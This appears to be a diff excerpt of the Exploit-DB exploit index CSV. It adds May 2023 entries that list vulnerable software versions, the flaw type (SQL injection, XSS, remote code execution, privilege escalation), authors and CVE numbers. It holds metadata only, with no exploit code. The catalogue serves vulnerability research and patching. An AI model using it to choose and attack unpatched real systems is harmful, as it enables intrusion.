8577,exploits/php/webapps/8577.txt,"Leap CMS 0.1.4 - SQL Injection / Cross-Site Scripting / Arbitrary File Upload",2009-04-30,YEnH4ckEr,webapps,php,,2009-04-29,,1,OSVDB-54405;CVE-2009-1615;OSVDB-54404;CVE-2009-1614;OSVDB-54403;OSVDB-54402;CVE-2009-1613,,,,,
@ -27727,6 +27748,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
8866,exploits/php/webapps/8866.php,"Podcast Generator 1.2 - Unauthorized Re-Installation",2009-06-03,StAkeR,webapps,php,,2009-06-02,2016-11-23,1,OSVDB-67403;OSVDB-67402;OSVDB-67401;OSVDB-67400;OSVDB-67399;OSVDB-67398;OSVDB-67397;OSVDB-67396;OSVDB-67395;OSVDB-67393;OSVDB-67392;OSVDB-67391;OSVDB-67390;OSVDB-67389;OSVDB-67388;OSVDB-67387;OSVDB-67386;OSVDB-55258;OSVDB-55257;OSVDB-55256,,,,http://www.exploit-db.compodcastgen1.2.zip,
16109,exploits/php/webapps/16109.txt,"Podcast Generator 1.3 - Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",webapps,php,,2011-02-04,2016-11-14,1,,,,,http://www.exploit-db.compodcastgen1.3.zip,http://www.htbridge.ch/advisory/local_file_inclusion_in_podcast_generator.html
49866,exploits/php/webapps/49866.txt,"Podcast Generator 3.1 - 'Long Description' Persistent Cross-Site Scripting (XSS)",2021-05-14,"Ayşenur KARAASLAN",webapps,php,,2021-05-14,2021-05-14,0,,,,,http://www.exploit-db.comPodcastGenerator-3.1.zip,
51454,exploits/php/webapps/51454.txt,"PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS)",2023-05-23,"Mirabbas Ağalarov",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
26414,exploits/php/webapps/26414.txt,"PodHawk 1.85 - Arbitrary File Upload",2013-06-24,"CWH Underground",webapps,php,,2013-06-24,2013-06-24,0,OSVDB-94549,,,,,
11473,exploits/php/webapps/11473.txt,"Pogodny CMS - SQL Injection",2010-02-16,Ariko-Security,webapps,php,,2010-02-15,,1,OSVDB-62343;CVE-2010-0671,,,,,
17141,exploits/php/webapps/17141.txt,"Point Market System 3.1x vBulletin plugin - SQL Injection",2011-04-10,Net.Edit0r,webapps,php,,2011-04-10,2011-04-10,0,,,,,http://www.exploit-db.comPointMarket3.1.0Alpha1.rar,
@ -27992,6 +28014,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48347,exploits/php/webapps/48347.txt,"Prestashop 1.7.6.4 - Cross-Site Request Forgery",2020-04-20,"Sivanesh Ashok",webapps,php,,2020-04-20,2020-06-18,0,,,,,,
49755,exploits/php/webapps/49755.py,"PrestaShop 1.7.6.7 - 'location' Blind Sql Injection",2021-04-09,"Vanshal Gaur",webapps,php,,2021-04-09,2021-04-09,0,CVE-2020-15160,,,,,
49410,exploits/php/webapps/49410.txt,"Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection",2021-01-11,"Jaimin Gondaliya",webapps,php,,2021-01-11,2021-01-11,0,,,,,,
51463,exploits/php/webapps/51463.txt,"Prestashop 8.0.4 - CSV injection",2023-05-23,"Mirabbas Ağalarov",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
45046,exploits/php/webapps/45046.py,"PrestaShop < 1.6.1.19 - 'AES CBC' Privilege Escalation",2018-07-16,"Charles Fol",webapps,php,,2018-07-18,2018-07-18,0,CVE-2018-13784,,,,,https://github.com/ambionics/prestashop-exploits/blob/3bcb6af9954c03f269623c4752788f8de80602b9/prestashop_aes_cbc/prestashop_cbc_read.py
45047,exploits/php/webapps/45047.txt,"PrestaShop < 1.6.1.19 - 'BlowFish ECD' Privilege Escalation",2018-07-16,"Charles Fol",webapps,php,,2018-07-18,2018-07-18,0,CVE-2018-13784,,,,,https://ambionics.io/blog/prestashop-privilege-escalation
51001,exploits/php/webapps/51001.py,"Prestashop blockwishlist module 2.1.0 - SQLi",2022-08-09,"Karthik UJ",webapps,php,,2022-08-09,2022-08-09,0,CVE-2022-31101,,,,,
@ -28341,6 +28364,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
11554,exploits/php/webapps/11554.txt,"QuickDev 4 PHP - Database Disclosure",2010-02-23,ViRuSMaN,webapps,php,,2010-02-22,,1,,,,,,
5733,exploits/php/webapps/5733.txt,"QuickerSite 1.8.5 - Multiple Vulnerabilities",2008-06-03,BugReport.IR,webapps,php,,2008-06-02,,1,OSVDB-46738;CVE-2008-6678;OSVDB-46736;CVE-2008-6677;OSVDB-46228;CVE-2008-6676;OSVDB-46227;CVE-2008-6675;OSVDB-46226;OSVDB-46225;OSVDB-46224;OSVDB-46223;CVE-2008-6674;OSVDB-46222;CVE-2008-6673;OSVDB-46221;OSVDB-46220;OSVDB-46219,,,,,http://bugreport.ir/index.php?/39
4193,exploits/php/webapps/4193.txt,"QuickEStore 8.2 - 'insertorder.cfm' SQL Injection",2007-07-18,meoconx,webapps,php,,2007-07-17,,1,OSVDB-36358;CVE-2007-3933,,,,,
51474,exploits/php/webapps/51474.txt,"Quicklancer v1.0 - SQL Injection",2023-05-23,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
26828,exploits/php/webapps/26828.txt,"QuickPayPro 3.1 - 'customer.tickets.view.php' Multiple SQL Injections",2005-12-14,r0t,webapps,php,,2005-12-14,2013-07-15,1,CVE-2005-4243;OSVDB-21677,,,,,https://www.securityfocus.com/bid/15863/info
26830,exploits/php/webapps/26830.txt,"QuickPayPro 3.1 - 'design.php?delete' SQL Injection",2005-12-14,r0t,webapps,php,,2005-12-14,2013-07-15,1,CVE-2005-4243;OSVDB-21679,,,,,https://www.securityfocus.com/bid/15863/info
26827,exploits/php/webapps/26827.txt,"QuickPayPro 3.1 - 'popups.edit.php?popupid' SQL Injection",2005-12-14,r0t,webapps,php,,2005-12-14,2013-07-15,1,CVE-2005-4243;OSVDB-21676,,,,,https://www.securityfocus.com/bid/15863/info
@ -29489,6 +29513,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35877,exploits/php/webapps/35877.txt,"Sitemagic CMS - 'SMTpl' Directory Traversal",2011-06-23,"Andrea Bocchetti",webapps,php,,2011-06-23,2015-01-23,1,,,,,,https://www.securityfocus.com/bid/48399/info
35871,exploits/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 - 'SMExt' Cross-Site Scripting",2011-06-21,"Gjoko Krstic",webapps,php,,2011-06-21,2015-01-23,1,OSVDB-73201,,,,,https://www.securityfocus.com/bid/48355/info
48788,exploits/php/webapps/48788.txt,"SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated)",2020-09-03,V1n1v131r4,webapps,php,,2020-09-03,2020-09-03,0,,,,,,
51464,exploits/php/webapps/51464.txt,"SitemagicCMS 4.4.3 - Remote Code Execution (RCE)",2023-05-23,"Mirabbas Ağalarov",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
44793,exploits/php/webapps/44793.txt,"Sitemakin SLAC 1.0 - 'my_item_search' SQL Injection",2018-05-29,"Divya Jain",webapps,php,,2018-05-29,2018-05-29,0,CVE-2018-11535,,,,,
25052,exploits/php/webapps/25052.pl,"Siteman 1.1 - User Database Privilege Escalation (1)",2005-01-19,"Noam Rathaus",webapps,php,,2005-01-19,2013-04-28,1,CVE-2005-0305;OSVDB-13811,,,,,https://www.securityfocus.com/bid/12304/info
25053,exploits/php/webapps/25053.html,"Siteman 1.1 - User Database Privilege Escalation (2)",2005-01-19,amironline452,webapps,php,,2005-01-19,2013-04-28,1,CVE-2005-0305;OSVDB-13811,,,,,https://www.securityfocus.com/bid/12304/info
@ -29571,6 +29596,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
10437,exploits/php/webapps/10437.txt,"Smart PHP Subscriber - Multiple Disclosure Vulnerabilities",2009-12-14,"Milos Zivanovic",webapps,php,,2009-12-13,,1,CVE-2007-0518;OSVDB-32946,,,,,
10727,exploits/php/webapps/10727.txt,"Smart PHP Uploader 1.0 - Arbitrary File Upload",2009-12-27,Phenom,webapps,php,,2009-12-26,,1,,,,,http://www.exploit-db.comphpuploader.zip,
5003,exploits/php/webapps/5003.txt,"Smart Publisher 1.0.1 - 'filedata' Remote Code Execution",2008-01-29,GoLd_M,webapps,php,,2008-01-28,2016-11-14,1,OSVDB-40780;CVE-2008-0503,,,,http://www.exploit-db.comsmart-publisher-1.0.1.zip,
51472,exploits/php/webapps/51472.txt,"Smart School v1.0 - SQL Injection",2023-05-23,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
45049,exploits/php/webapps/45049.txt,"Smart SMS & Email Manager 3.3 - 'contact_type_id' SQL Injection",2018-07-18,AkkuS,webapps,php,80,2018-07-18,2018-07-18,0,,"SQL Injection (SQLi)",,,,
34067,exploits/php/webapps/34067.txt,"Smart Statistics 1.0 - 'smart_Statistics_admin.php' Cross-Site Scripting",2010-01-10,R3d-D3V!L,webapps,php,,2010-01-10,2014-07-15,1,,,,,,https://www.securityfocus.com/bid/40468/info
10977,exploits/php/webapps/10977.txt,"Smart Vision Script News - 'newsdetail.php' SQL Injection (1)",2010-01-03,Err0R,webapps,php,,2010-01-02,,1,,,,,,
@ -29972,6 +29998,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
24227,exploits/php/webapps/24227.txt,"SqWebMail 4.0.4.20040524 - Email Header HTML Injection",2004-06-21,"Luca Legato",webapps,php,,2004-06-21,2013-01-19,1,CVE-2004-0591;OSVDB-7214,,,,,https://www.securityfocus.com/bid/10588/info
26200,exploits/php/webapps/26200.txt,"SqWebMail 5.0.4 - HTML Email IMG Tag Script Injection",2005-08-29,"Jakob Balle",webapps,php,,2005-08-29,2013-06-14,1,CVE-2005-2769;OSVDB-19047,,,,,https://www.securityfocus.com/bid/14676/info
8636,exploits/php/webapps/8636.txt,"ST-Gallery 0.1a - Multiple SQL Injections",2009-05-07,YEnH4ckEr,webapps,php,,2009-05-06,,1,OSVDB-54793;CVE-2009-1799,,,,,
51473,exploits/php/webapps/51473.txt,"Stackposts Social Marketing Tool v1.0 - SQL Injection",2023-05-23,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
25189,exploits/php/webapps/25189.txt,"Stadtaus.Com Download Center Lite 1.5 - PHP Remote File Inclusion",2005-03-04,"Filip Groszynski",webapps,php,,2005-03-04,2013-05-04,1,,,,,,https://www.securityfocus.com/bid/12726/info
25192,exploits/php/webapps/25192.pl,"Stadtaus.Com PHP Form Mail Script 2.3 - Remote File Inclusion",2005-03-05,mozako,webapps,php,,2005-03-05,2013-05-04,1,,,,,,https://www.securityfocus.com/bid/12735/info
36031,exploits/php/webapps/36031.txt,"StaMPi - Local File Inclusion",2015-02-09,"e . V . E . L",webapps,php,,2015-02-09,2015-02-09,0,,,,,,
@ -30516,6 +30543,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9674,exploits/php/webapps/9674.txt,"Three Pillars Help Desk 3.0 - Authentication Bypass",2009-09-15,snakespc,webapps,php,,2009-09-14,,1,OSVDB-58249,,,,,
47814,exploits/php/webapps/47814.txt,"Thrive Smart Home 1.1 - Authentication Bypass",2019-12-30,LiquidWorm,webapps,php,,2019-12-30,2019-12-30,0,,,,,,
47583,exploits/php/webapps/47583.txt,"thrsrossi Millhouse-Project 1.414 - 'content' Persistent Cross-Site Scripting",2019-11-05,cakes,webapps,php,80,2019-11-05,2019-11-05,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comMillhouse-Project-master.zip,
51450,exploits/php/webapps/51450.php,"thrsrossi Millhouse-Project 1.414 - Remote Code Execution",2023-05-23,"Chokri Hammedi",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
27687,exploits/php/webapps/27687.txt,"ThWboard 2.8 - 'showtopic.php' SQL Injection",2006-04-19,Qex,webapps,php,,2006-04-19,2013-08-19,1,CVE-2006-1926;OSVDB-27435,,,,,https://www.securityfocus.com/bid/17606/info
27711,exploits/php/webapps/27711.txt,"ThWboard 3.0 - 'index.php' Cross-Site Scripting",2006-04-20,"CrAzY CrAcKeR",webapps,php,,2006-04-20,2013-08-20,1,CVE-2006-2037;OSVDB-25210,,,,,https://www.securityfocus.com/bid/17627/info
3124,exploits/php/webapps/3124.php,"ThWboard 3.0b2.84-php5 - SQL Injection / Code Execution",2007-01-14,rgod,webapps,php,,2007-01-13,2016-09-21,1,OSVDB-32837;CVE-2007-0340,,,,http://www.exploit-db.comthwb-300-beta-2.84-php5.tar.gz,
@ -30661,6 +30689,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
16090,exploits/php/webapps/16090.txt,"TinyWebGallery 1.8.3 - Multiple Vulnerabilities",2011-02-01,"Yam Mesicka",webapps,php,,2011-02-01,2012-06-22,0,OSVDB-70743,,,,http://www.exploit-db.comtwg183.zip,
18322,exploits/php/webapps/18322.txt,"TinyWebGallery 1.8.3 - Remote Command Execution",2012-01-06,Expl0!Ts,webapps,php,,2012-01-06,2012-01-06,0,OSVDB-82603;OSVDB-82481;CVE-2012-5347,,,,,
36094,exploits/php/webapps/36094.txt,"TinyWebGallery 1.8.4 - Local File Inclusion / SQL Injection",2011-08-31,KedAns-Dz,webapps,php,,2011-08-31,2015-02-16,1,,,,,,https://www.securityfocus.com/bid/49393/info
51443,exploits/php/webapps/51443.txt,"TinyWebGallery v2.5 - Remote Code Execution (RCE)",2023-05-23,"Mirabbas Ağalarov",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
51442,exploits/php/webapps/51442.txt,"TinyWebGallery v2.5 - Stored Cross-Site Scripting (XSS)",2023-05-13,"Mirabbas Ağalarov",webapps,php,,2023-05-13,2023-05-13,0,,,,,,
5947,exploits/php/webapps/5947.txt,"Tips Complete Website 1.2.0 - 'tipid' SQL Injection",2008-06-26,InjEctOr5,webapps,php,,2008-06-25,2016-12-09,1,OSVDB-46526;CVE-2008-5168,,,,,
23322,exploits/php/webapps/23322.txt,"TipsOfTheDay MyBB Plugin - Multiple Vulnerabilities",2012-12-12,VipVince,webapps,php,,2012-12-12,2012-12-12,0,OSVDB-88394;OSVDB-88393,,,,http://www.exploit-db.comTipsOfTheDay.zip,
@ -31785,6 +31814,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
3490,exploits/php/webapps/3490.txt,"wbblog - Cross-Site Scripting / SQL Injection",2007-03-15,"Mehmet Ince",webapps,php,,2007-03-14,,1,OSVDB-34183;CVE-2007-1482;OSVDB-34182;CVE-2007-1481,,,,,
50609,exploits/php/webapps/50609.py,"WBCE CMS 1.5.1 - Admin Password Reset",2021-12-20,citril,webapps,php,,2021-12-20,2021-12-20,0,CVE-2021-3817,,,,,
50707,exploits/php/webapps/50707.py,"WBCE CMS 1.5.2 - Remote Code Execution (RCE) (Authenticated)",2022-02-04,"Antonio Cuomo",webapps,php,,2022-02-04,2022-02-04,0,,,,,,
51451,exploits/php/webapps/51451.txt,"WBiz Desk 1.2 - SQL Injection",2023-05-23,h4ck3r,webapps,php,,2023-05-23,2023-05-23,0,,,,,,
7337,exploits/php/webapps/7337.txt,"wbstreet 1.0 - SQL Injection / File Disclosure",2008-12-04,"CWH Underground",webapps,php,,2008-12-03,,1,OSVDB-51579;CVE-2008-5956;OSVDB-51575;CVE-2008-5955;OSVDB-50445;OSVDB-50444,,,,,
43864,exploits/php/webapps/43864.txt,"Wchat 1.5 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,,2018-01-23,2018-01-23,0,CVE-2018-5979,,,,,
44683,exploits/php/webapps/44683.txt,"Wchat PHP AJAX Chat Script 1.5 - Cross-Site Scripting",2018-05-21,L0RD,webapps,php,,2018-05-21,2018-05-22,0,,,,,,
@ -32015,6 +32045,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
22812,exploits/php/webapps/22812.txt,"WebJeff FileManager 1.6 - File Disclosure",2003-06-20,"Adam Stephens",webapps,php,,2003-06-20,2012-11-18,1,,,,,,https://www.securityfocus.com/bid/7995/info
3717,exploits/php/webapps/3717.txt,"WebKalk2 1.9.0 - 'absolute_path' Remote File Inclusion",2007-04-12,GoLd_M,webapps,php,,2007-04-11,,1,OSVDB-35747;CVE-2007-2307,,,,,
38024,exploits/php/webapps/38024.txt,"WebKit Cross-Site Scripting Filter - 'Cross-Site ScriptingAuditor.cpp' Security Bypass",2012-07-19,"Tushar Dalvi",webapps,php,,2012-07-19,2015-08-31,1,CVE-2012-5851;OSVDB-87521,,,,,https://www.securityfocus.com/bid/56570/info
51465,exploits/php/webapps/51465.txt,"Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)",2023-05-23,"Astik Rawat",webapps,php,,2023-05-23,2023-05-23,0,CVE-2023-30256,,,,,
9164,exploits/php/webapps/9164.txt,"webLeague 2.2.0 - 'install.php' Remote Change Password",2009-07-16,TiGeR-Dz,webapps,php,,2009-07-15,,1,,,,,,
9162,exploits/php/webapps/9162.txt,"WebLeague 2.2.0 - 'profile.php' SQL Injection",2009-07-15,Arka69,webapps,php,,2009-07-14,,1,OSVDB-61553;CVE-2009-4560,,,,,
9165,exploits/php/webapps/9165.pl,"webLeague 2.2.0 - Authentication Bypass",2009-07-16,ka0x,webapps,php,,2009-07-15,,1,OSVDB-61554;CVE-2009-4561,,,,,
@ -32512,6 +32543,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
19524,exploits/php/webapps/19524.txt,"WordPress Plugin Backup 2.0.1 - Information Disclosure",2012-07-02,"Stephan Knauss",webapps,php,,2012-07-02,2012-07-04,1,OSVDB-83701,"WordPress Plugin",,http://www.exploit-db.com/screenshots/idlt20000/backup.png,http://www.exploit-db.combackup.2.0.1.zip,
50503,exploits/php/webapps/50503.txt,"WordPress Plugin Backup and Restore 1.0.3 - Arbitrary File Deletion",2021-11-08,"Murat DEMİRCİ",webapps,php,,2021-11-08,2021-11-08,0,,,,,http://www.exploit-db.combackup-and-restore-for-wp.1.0.3.zip,
50093,exploits/php/webapps/50093.py,"Wordpress Plugin Backup Guard 1.5.8 - Remote Code Execution (Authenticated)",2021-07-05,"Ron Jost",webapps,php,,2021-07-05,2021-07-05,0,CVE-2021-24155,,,,http://www.exploit-db.combackup.1.5.8.zip,
51445,exploits/php/webapps/51445.txt,"WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup",2023-05-23,Wadeek,webapps,php,,2023-05-23,2023-05-23,0,,,,,,
4593,exploits/php/webapps/4593.txt,"WordPress Plugin BackUpWordPress 0.4.2b - Remote File Inclusion",2007-11-01,S.W.A.T.,webapps,php,,2007-10-31,,1,OSVDB-38479;CVE-2007-5800;OSVDB-38478;OSVDB-38477;OSVDB-38476,"WordPress Plugin",,,,
17056,exploits/php/webapps/17056.txt,"WordPress Plugin BackWPup - Remote Code Execution / Local Code Execution",2011-03-28,"Sense of Security",webapps,php,,2011-03-28,2011-03-28,0,OSVDB-71481;CVE-2011-4342,"WordPress Plugin",,,,http://www.senseofsecurity.com.au/advisories/SOS-11-003.pdf
35400,exploits/php/webapps/35400.txt,"WordPress Plugin BackWPup 1.4 - Multiple Information Disclosure Vulnerabilities",2011-02-28,"Danilo Massa",webapps,php,,2011-02-28,2014-11-30,1,,,,,,https://www.securityfocus.com/bid/46610/info
@ -34481,6 +34513,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
40086,exploits/ruby/remote/40086.rb,"Ruby on Rails ActionPack Inline ERB - Code Execution (Metasploit)",2016-07-11,Metasploit,remote,ruby,80,2016-07-11,2016-07-11,1,CVE-2016-2098,"Metasploit Framework (MSF)",,,,
45601,exploits/ruby/webapps/45601.txt,"AlchemyCMS 4.1 - Cross-Site Scripting",2018-10-15,"Ismail Tasdelen",webapps,ruby,80,2018-10-15,2018-10-18,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comalchemy_cms-4.1.0.tar.gz,
45592,exploits/ruby/webapps/45592.txt,"CAMALEON CMS 2.4 - Cross-Site Scripting",2018-10-12,"Ismail Tasdelen",webapps,ruby,80,2018-10-12,2018-10-18,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comcamaleon-cms-2.4.0.tar.gz,
51446,exploits/ruby/webapps/51446.txt,"Cameleon CMS 2.7.4 - Persistent Stored XSS in Post Title",2023-05-23,"Yasin Gergin",webapps,ruby,,2023-05-23,2023-05-23,0,,,,,,
46617,exploits/ruby/webapps/46617.txt,"Fat Free CRM 0.19.0 - HTML Injection",2019-03-28,"Ismail Tasdelen",webapps,ruby,80,2019-03-28,2019-03-29,0,CVE-2019-10226,,,,http://www.exploit-db.comfat_free_crm-0.18.1.tar.gz,
41616,exploits/ruby/webapps/41616.rb,"GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution",2017-03-15,iblue,webapps,ruby,,2017-03-15,2017-03-27,1,,,,,,http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html
40236,exploits/ruby/webapps/40236.txt,"GitLab - 'impersonate' Feature Privilege Escalation",2016-08-15,Kaimi,webapps,ruby,80,2016-08-15,2016-08-15,0,CVE-2016-4340,,,,,
@ -39960,6 +39993,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
32205,exploits/windows/local/32205.txt,"Huawei Technologies eSpace Meeting Service 1.0.0.23 - Local Privilege Escalation",2014-03-12,LiquidWorm,local,windows,,2014-03-12,2014-03-12,0,OSVDB-104323;CVE-2014-3222,,,,,http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-329170.htm
21988,exploits/windows/local/21988.pl,"Huawei Technologies Internet Mobile - Unicode (SEH)",2012-10-15,Dark-Puzzle,local,windows,,2012-10-15,2012-10-15,0,OSVDB-87008;CVE-2012-6568,,,,,
40807,exploits/windows/local/40807.txt,"Huawei UTPS - Unquoted Service Path Privilege Escalation",2016-11-22,"Dhruv Shah",local,windows,,2016-11-22,2016-11-22,1,CVE-2016-8769,,,,,
51461,exploits/windows/local/51461.txt,"Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking",2023-05-23,"Ahsan Azad",local,windows,,2023-05-23,2023-05-23,0,,,,,,
35177,exploits/windows/local/35177.py,"i-FTP 2.20 - Local Buffer Overflow (SEH)",2014-11-06,metacom,local,windows,,2014-11-06,2016-10-10,1,OSVDB-114279,,,,http://www.exploit-db.comiftp-win32-v220.exe,
35671,exploits/windows/local/35671.rb,"i-FTP Schedule - Local Buffer Overflow (Metasploit)",2015-01-01,Metasploit,local,windows,,2015-01-01,2015-01-01,1,OSVDB-114279,"Metasploit Framework (MSF)",,,http://www.exploit-db.comiftp-win32-v220.exe,
35040,exploits/windows/local/35040.txt,"iBackup 10.0.0.32 - Local Privilege Escalation",2014-10-22,"Glafkos Charalambous",local,windows,,2014-10-22,2014-10-22,0,CVE-2014-5507;OSVDB-113675,,,,,
@ -40700,6 +40734,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
18657,exploits/windows/local/18657.pl,"mmPlayer 2.2 - '.ppl' Local Buffer Overflow (SEH)",2012-03-23,"RjRjh Hack3r",local,windows,,2012-03-23,2012-05-27,1,OSVDB-80532,,,http://www.exploit-db.com/screenshots/idlt19000/screen-shot-2012-05-27-at-21851-pm.png,http://www.exploit-db.commmplayer.zip,
47429,exploits/windows/local/47429.py,"Mobatek MobaXterm 12.1 - Buffer Overflow (SEH)",2019-09-27,"Xavi Beltran",local,windows,,2019-09-27,2019-10-03,0,,,,,,
47667,exploits/windows/local/47667.txt,"MobileGo 8.5.0 - Insecure File Permissions",2019-11-18,ZwX,local,windows,,2019-11-18,2019-11-18,0,,,,,,
51479,exploits/windows/local/51479.txt,"MobileTrans 4.0.11 - Weak Service Privilege Escalation",2023-05-23,"Thurein Soe",local,windows,,2023-05-23,2023-05-23,0,CVE-2023-31748,,,,,
36053,exploits/windows/local/36053.py,"MooPlayer 1.3.0 - 'm3u' Local Buffer Overflow (SEH) (1)",2015-02-11,"dogo h@ck",local,windows,,2015-02-11,2015-02-11,0,OSVDB-118128,,,,http://www.exploit-db.commooplayer-1.3.0.zip,
36819,exploits/windows/local/36819.pl,"MooPlayer 1.3.0 - 'm3u' Local Buffer Overflow (SEH) (2)",2015-04-22,"Tomislav Paskalev",local,windows,,2015-04-22,2015-04-22,1,OSVDB-118128,,,http://www.exploit-db.com/screenshots/idlt37000/screen-shot-2015-04-22-at-70835-pm.png,http://www.exploit-db.commooplayer-1.3.0.zip,
13942,exploits/windows/local/13942.pl,"MoreAmp - '.maf' Local Stack Buffer Overflow (SEH)",2010-06-20,Madjix,local,windows,,2010-06-19,,1,CVE-2010-2439;OSVDB-65789,,,http://www.exploit-db.com/screenshots/idlt14000/13942.png,http://www.exploit-db.comMoreAmp-0.1.25-binWin.zip,
@ -41313,6 +41348,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47940,exploits/windows/local/47940.txt,"Trend Micro Maximum Security 2019 - Arbitrary Code Execution",2020-01-17,hyp3rlinx,local,windows,,2020-01-17,2020-01-17,0,,,,,,
47943,exploits/windows/local/47943.txt,"Trend Micro Maximum Security 2019 - Privilege Escalation",2020-01-17,hyp3rlinx,local,windows,,2020-01-17,2020-01-17,0,,,,,,
42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,,2017-09-28,2017-09-28,1,,,,,,
51453,exploits/windows/local/51453.txt,"Trend Micro OfficeScan Client 10.0 - ACL Service LPE",2023-05-23,msd0pe,local,windows,,2023-05-23,2023-05-23,0,,,,,,
15376,exploits/windows/local/15376.c,"Trend Micro Titanium Maximum Security 2011 - Local Kernel",2010-11-01,"Nikita Tarakanov",local,windows,,2010-11-01,2010-11-12,1,OSVDB-69018,,,,http://www.exploit-db.comTrend_Micro.exe,
44858,exploits/windows/local/44858.txt,"TrendMicro OfficeScan XG 11.0 - Change Prevention Bypass",2018-06-08,hyp3rlinx,local,windows,,2018-06-08,2018-06-08,1,CVE-2018-10507,,,,,
50633,exploits/windows/local/50633.txt,"TRIGONE Remote System Monitor 3.61 - Unquoted Service Path",2022-01-05,"Yehia Elghaly",local,windows,,2022-01-05,2022-01-05,0,,,,,http://www.exploit-db.comRemote_System_monitor_Server_3.61_x86_Setup.exe,
@ -45332,6 +45368,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42154,exploits/windows/webapps/42154.py,"EFS Easy Chat Server 3.1 - Password Reset",2017-06-09,"Aitezaz Mohsin",webapps,windows,,2017-06-11,2017-06-11,1,,,,http://www.exploit-db.com/screenshots/idlt42500/screen-shot-2017-06-11-at-112909.png,http://www.exploit-db.comecssetup.exe,
47811,exploits/windows/webapps/47811.txt,"elearning-script 1.0 - Authentication Bypass",2019-12-30,riamloo,webapps,windows,,2019-12-30,2019-12-30,0,,,,,,
20349,exploits/windows/webapps/20349.py,"emailarchitect enterprise email server 10.0 - Persistent Cross-Site Scripting",2012-08-08,loneferret,webapps,windows,,2012-08-08,2012-08-08,1,CVE-2012-2591;OSVDB-84520,,,http://www.exploit-db.com/screenshots/idlt20500/emailarchitect-payload-0.png,,
51467,exploits/windows/webapps/51467.txt,"eScan Management Console 14.0.1400.2281 - Cross Site Scripting",2023-05-23,"Sahil Ojha",webapps,windows,,2023-05-23,2023-05-23,0,CVE-2023-31703,,,,,
51466,exploits/windows/webapps/51466.txt,"eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)",2023-05-23,"Sahil Ojha",webapps,windows,,2023-05-23,2023-05-23,0,CVE-2023-31702,,,,,
20350,exploits/windows/webapps/20350.py,"escon supportportal pro 3.0 - Persistent Cross-Site Scripting",2012-08-08,loneferret,webapps,windows,,2012-08-08,2012-08-08,1,CVE-2012-2590;OSVDB-84747,,,http://www.exploit-db.com/screenshots/idlt20500/supportportal-payload-0.png,,
45319,exploits/windows/webapps/45319.txt,"FsPro Labs Event Log Explorer v4.6.1.2115 - XML External Entity Injection",2018-09-03,hyp3rlinx,webapps,windows,,2018-09-03,2018-09-03,0,CVE-2018-16252,"XML External Entity (XXE)",,,http://www.exploit-db.comelex_setup.exe,
38379,exploits/windows/webapps/38379.txt,"FTGate 2009 Build 6.4.00 - Multiple Vulnerabilities",2015-10-02,hyp3rlinx,webapps,windows,,2015-10-02,2015-10-02,0,OSVDB-128434;OSVDB-128433;OSVDB-128432,,,,,http://hyp3rlinx.altervista.org/advisories/AS-FTGATE-2009-CSRF.txt

Can't render this file because it is too large.